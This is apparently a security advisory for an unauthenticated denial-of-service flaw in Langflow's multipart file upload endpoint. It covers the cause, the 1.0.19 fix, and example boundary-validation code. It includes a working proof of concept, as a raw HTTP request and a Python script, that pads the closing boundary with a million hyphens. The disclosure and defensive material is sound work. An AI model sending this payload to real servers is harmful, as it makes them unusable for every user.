Langflow: Unauthenticated DoS through multipart form boundary file upload
Description
Summary
An attacker can send a /api/v1/files/upload/ request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time.
Details
https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40
The file upload handler tries to parse the multipart form data even when it is malformed, for example when an extremely long run of hyphens follows the closing boundary. It also does not perform the authentication check before processing this data, so an unauthenticated attacker can trigger this just as an authenticated user can.
Additionally, the attacker does not need to know a valid flow UUID to send this request: the server still tries to process the oversized boundary with any arbitrary value in place of the flow ID.
PoC
An attacker makes this request to upload a file without valid authentication information or a valid flow ID:
POST /api/v1/files/upload/test HTTP/1.1
Host: 127.0.0.1:7860
Content-Length: 3000192
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:7860
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryorGBAKSkv5wR6WqJ
Content-Disposition: form-data; name="file"; filename="dos.txt"
Content-Type: text/plain
DoS in progress!
------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------
Here is the same request in Python:
import requests
url = "http://127.0.0.1:7860/api/v1/files/upload/test"
headers = {
"Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ"
}
data = (
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n"
"Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n"
"Content-Type: text/plain\r\n\r\n"
"DoS in progress\r\n"
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n"
)
response = requests.post(url, headers=headers, data=data)
The app is then stuck in the "server is busy" state for all users.
Impact
Sending this request makes the server unusable for all users, and the condition can be kept up indefinitely because the request can be repeated as often as the attacker likes.
Patches
Fixed in 1.0.19 via PR #3923. A check_boundary HTTP middleware was added that validates the multipart boundary (^[\w\-]{1,70}$) and rejects malformed requests, including the oversized-hyphen payload, with HTTP 422 before the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (get_current_active_user + 403 on mismatch), closing the unauthenticated access vector. Upgrade to 1.0.19 or later.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Range: <1.0.19
Vulnerability mechanics
Root cause
"Missing input validation on multipart boundary length and missing authentication check in the file upload endpoint allow an unauthenticated attacker to exhaust server resources."
Attack vector
An unauthenticated attacker sends a POST request to `/api/v1/files/upload/<any>` with a `Content-Type` header containing a multipart boundary followed by an extremely long sequence of hyphens (e.g., 1,000,000 dashes) [ref_id=1]. The server attempts to parse this oversized boundary, consuming excessive resources and rendering the application unusable for all users indefinitely. No authentication token, valid flow UUID, or prior access is required [ref_id=2]. The attack can be repeated arbitrarily to maintain the denial-of-service condition.
Affected code
The vulnerability resides in the file upload endpoint at `src/backend/base/langflow/api/v1/files.py` (line 40 in v1.0.18). The `upload_file` function processes multipart form data without first validating the boundary length or authenticating the user, and it does not require a valid flow ID. The patch adds a `check_boundary` middleware in `src/backend/base/langflow/main.py` and injects authentication/ownership checks into the upload handler.
What the fix does
The patch introduces a `check_boundary` HTTP middleware in `main.py` that validates the multipart boundary against the regex `^[\w\-]{1,70}$` and rejects malformed requests with HTTP 422 before the body is parsed [patch_id=6633370]. It also verifies that the body starts with `--<boundary>` and ends with `--<boundary>--\r\n`, blocking the oversized-hyphen payload. Additionally, the `upload_file` endpoint now requires `get_current_active_user` and checks that the flow belongs to the authenticated user (403 on mismatch), closing the unauthenticated access vector.
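To make the two checks described in the Patches section and above concrete, here is an added example (my own code, not the Langflow project's middleware; function names are assumptions) that applies the boundary regex to the Content-Type header and then checks the body framing. It also shows why both checks are needed: a boundary of 70 characters or fewer passes the regex, and it is the trailing `--<boundary>--\r\n` requirement that rejects a body ending in a long run of hyphens.

```python
import re
from typing import Optional

# Same pattern the advisory reports for the check_boundary middleware.
BOUNDARY_RE = re.compile(r"^[\w\-]{1,70}$")


def extract_boundary(content_type: str) -> Optional[str]:
    """Return the boundary parameter of a multipart/form-data Content-Type, else None."""
    media_type, _, params = content_type.partition(";")
    if media_type.strip().lower() != "multipart/form-data":
        return None
    for param in params.split(";"):
        key, _, value = param.strip().partition("=")
        if key.strip().lower() == "boundary":
            return value.strip().strip('"')
    return None


def boundary_is_valid(boundary: Optional[str]) -> bool:
    """Accept only a present boundary of 1 to 70 word characters or hyphens."""
    return boundary is not None and BOUNDARY_RE.fullmatch(boundary) is not None


def body_is_framed(body: bytes, boundary: str) -> bool:
    """Require the body to open with the first delimiter and close with the final one."""
    delim = b"--" + boundary.encode("ascii")
    return body.startswith(delim) and body.endswith(delim + b"--\r\n")


def check_upload(content_type: str, body: bytes) -> int:
    """Return 422 when the request must be rejected before multipart parsing, else 200."""
    boundary = extract_boundary(content_type)
    if not boundary_is_valid(boundary):
        return 422
    if not body_is_framed(body, boundary):
        return 422
    return 200


# Constructed sample request modelled on the advisory's PoC (hypothetical values).
BOUNDARY = "----WebKitFormBoundaryExampleOnly"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
PART = (f"--{BOUNDARY}\r\n"
        'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
        "Content-Type: text/plain\r\n\r\nhello\r\n").encode()
GOOD_BODY = PART + f"--{BOUNDARY}--\r\n".encode()
# Closing delimiter followed by a run of hyphens, the shape the advisory describes.
BAD_BODY = PART + (f"--{BOUNDARY}--" + "-" * 500 + "\r\n").encode()
```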
Preconditions
- auth: No authentication required; any unauthenticated network client can send the request
- input: No valid flow UUID needed; any arbitrary string in the URL path is accepted
- config: The server must be running langflow < 1.0.19 with the vulnerable endpoint exposed
- network: Attacker must be able to send HTTP POST requests to the target server
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.